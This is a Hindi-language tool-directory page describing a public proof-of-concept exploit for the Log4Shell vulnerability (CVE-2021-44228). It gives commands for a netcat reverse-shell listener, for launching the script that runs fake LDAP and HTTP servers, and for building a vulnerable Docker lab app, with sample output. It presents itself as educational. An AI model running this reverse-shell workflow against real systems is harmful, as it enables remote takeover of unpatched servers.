Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
LOGJ4_PocShell_CVE-2021-44228 — CVE-2021-44228 (Log4Shell) के लिए प्रूफ-ऑफ-कॉन्सेप्ट शोषण जो कमजोर Java अनुप्रयोग को रिवर्स शेल पेलोड देने के लिए LDAP और HTTP सर्वर को स्वचालित करता है। | Kitploit
उपकरण/GitHubGitHub/yanghyperdata/logj4_pocshell_cve-2021-44228
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणलर्निंग और शिक्षालैब और अभ्यास
GitHubyanghyperdata/logj4_pocshell_cve-2021-44228

LOGJ4_PocShell_CVE-2021-44228

CVE-2021-44228 (Log4Shell) के लिए प्रूफ-ऑफ-कॉन्सेप्ट शोषण जो कमजोर Java अनुप्रयोग को रिवर्स शेल पेलोड देने के लिए LDAP और HTTP सर्वर को स्वचालित करता है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
रिपॉजिटरी देखें
82 साल पहलेअभी तक समीक्षित नहीं
साझा करें

log4j-shell-poc

हाल ही में पाई गई CVE-2021-44228 भेद्यता के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट।

हाल ही में log4j में एक नई भेद्यता पाई गई, जो एक जावा लॉगिंग लाइब्रेरी है जिसका व्यापक रूप से elasticsearch, minecraft और कई अन्य में उपयोग किया जाता है।

इस रिपॉजिटरी में एक उदाहरण भेद्य अनुप्रयोग और इसका प्रूफ-ऑफ-कॉन्सेप्ट (POC) शोषण शामिल है।

प्रूफ-ऑफ-कॉन्सेप्ट (POC)

POC के रूप में एक पायथन फ़ाइल है जो प्रक्रिया को स्वचालित करती है।

आवश्यकताएँ:

pip install -r requirements.txt

उपयोग:

  • रिवर्स शेल कनेक्शन स्वीकार करने के लिए netcat लिसनर प्रारंभ करें।
nc -lvnp 9001
  • शोषण लॉन्च करें।
    नोट: इसके काम करने के लिए, निकाले गए जावा आर्काइव का नाम jdk1.8.0_20 होना चाहिए और उसी निर्देशिका में होना चाहिए।
$ python3 poc.py --userip localhost --webport 8000 --lport 9001

[!] CVE: CVE-2021-44228
[+] Exploit java class created success
[+] Setting up fake LDAP server
Listening on 0.0.0.0:1389

यह स्क्रिप्ट आपके लिए HTTP सर्वर और LDAP सर्वर सेट अप करेगी, और यह वह पेलोड भी बनाएगी जिसे आप भेद्य पैरामीटर में पेस्ट कर सकते हैं। इसके बाद, यदि सब कुछ ठीक रहा, तो आपको lport पर एक शेल मिलनी चाहिए।


भेद्य अनुप्रयोग

एक Dockerfile है जिसमें भेद्य वेबएप्प है। आप नीचे दिए गए चरणों का पालन करके इसका उपयोग कर सकते हैं:

1: docker build -t log4j-shell-poc .
2: docker run --network host log4j-shell-poc

एक बार यह चलने के बाद, आप इसे localhost:8080 पर एक्सेस कर सकते हैं।


जावा संस्करण प्राप्त करना।

Oracle कृपया पिछले सभी जावा संस्करणों के लिए एक आर्काइव प्रदान करता है:
https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html.
8u20 तक नीचे स्क्रॉल करें और अपने ऑपरेटिंग सिस्टम और हार्डवेयर के लिए उपयुक्त फ़ाइलें डाउनलोड करें। 2021-12-11 00-09-25 का स्क्रीनशॉट

नोट: पैकेज डाउनलोड करने में सक्षम होने के लिए आपको एक खाता बनाना होगा।

एक बार जब आप आर्काइव डाउनलोड और निकाल लेते हैं, तो आप jdk1.8.0_20/bin में java और कुछ संबंधित बाइनरी पा सकते हैं।
नोट: इसके काम करने के लिए jdk फ़ोल्डर को इसी नाम से इस रिपॉजिटरी में निकालना सुनिश्चित करें।

❯ tar -xf jdk-8u20-linux-x64.tar.gz

❯ ./jdk1.8.0_20/bin/java -version
java version "1.8.0_20"
Java(TM) SE Runtime Environment (build 1.8.0_20-b26)
Java HotSpot(TM) 64-Bit Server VM (build 25.20-b23, mixed mode)

अस्वीकरण

यह रिपॉजिटरी CVE-2021-44228 के लिए एक-क्लिक शोषण के रूप में अभिप्रेत नहीं है। इस परियोजना का उद्देश्य लोगों को इस भेद्यता के बारे में सीखने में मदद करना है, और शायद अपने स्वयं के अनुप्रयोगों का परीक्षण करना है (हालांकि इस उद्देश्य के लिए बेहतर अनुप्रयोग हैं, जैसे: https://log4shell.tools/)।

टूल डाउनलोड करें